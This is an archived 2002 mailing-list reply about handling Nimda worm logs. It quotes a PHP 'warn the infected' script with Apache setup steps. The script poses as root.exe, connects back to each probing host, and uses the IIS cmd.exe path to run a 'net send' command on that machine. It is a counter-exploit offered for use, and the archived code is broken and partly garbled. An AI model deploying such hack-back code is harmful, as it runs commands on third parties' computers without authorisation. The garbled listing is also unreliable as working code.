Re: Publishing Nimda Logs

From: Jonathan Bloomquist (bocasolutionsat_private)
Date: Tue May 07 2002 - 12:36:09 PDT

  • Next message: RSnake: "Re: Publishing Nimda Logs"

    --- "Deus, Attonbitus" <Thorat_private> wrote:
    -- snip --
    >   1) Recommended. Go for it and publish the IP's and
    > let the "Gods of IP"
    >   sort out the damage.
    >   2) A Bad Thing. These are innocent victims, and
    > you will just have them be
    >   attacked by evil people.
    >   3) Boring. Who cares? It's Nimda, and an everyday
    > part of life. Deal with
    >   it and ignore the logs.
    >   If "1," then I was thinking of going with a "Hall
    > of Shame" and providing
    >   ARIN look ups, contacts, and the whole bit. I
    > could even allow other
    >   people to post logs there and stuff like that...
    >   Input appreciated.
    How about another option (4. warn the infected) as
    proposed in this slashdot post (text follows): 
    I made a PHP script, by modifying a similar one used
    for Code Red. First make a "scripts" directory in your
    web server's root directory. Now put this into a file
    called "root.exe" 
    /* Open a connection to the offender */ 
    $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5); 
                                    /* Check to see if the
    connection actually opened */ 
                                    if ($fp) 
             /* URL-encode the message... */ 
             $string = urlencode("net send %COMPUTERNAME%
    WARNING: The NIMDA worm has been detected on your
    computer. Please shut down the IIS web server that is
    currently running and keep it disabled until you can
    patch and/or re-install your system, or better yet,
    upgrade to Linux or FreeBSD. Visit for more
             /* ...and send it */ 
             fputs ($fp, "GET
    em32/cmd.exe?/c+$string HTTP/1.0\n\n"); 
             /* close the connection (though it probably
    got closed automatically) */ 
             fclose ($fp); 
    /* for fun and confusion.. */ 
                                    header ("HTTP/1.0
                                echo ("<!DOCTYPE HTML
    PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"); 
    ("<html><head>\n<title>404 Not
    Found</title>\n</head></body>\n" ); 
                                    echo ("<h1>Not
                                    echo ("The requested
    URL $SCRIPT_NAME was not found on this server.\n"); 
    ("<address>Apache/1.3.20 Server at $SERVER_NAME Port
    $res = "dirty\r\n"; 
    $log = fopen("/tmp/nimda.log", "a"); 
    fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s
    T") . " - " . $res); 
    Then, (after making sure users can access the file..
    try going to http://machine/scripts/root.exe. It's
    going to print out the contents of that file. You want
    to change that, right? 
    Well here's how you change that. Edit your httpd.conf
    file (/etc/httpd.conf, /usr/local/apache/httpd.conf,
    whatever it is) and put this type in like this: 
    AddType application/x-httpd-php .php .php3 .exe 
    Now restart Apache by issuing one of either: 
    /etc/rc.d/init.d/httpd restart 
    apachectl restart 
    That should do it, and you're going to have a logfile
    of all the people who have been warned in
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    This archive was generated by hypermail 2b30 : Tue May 07 2002 - 13:35:46 PDT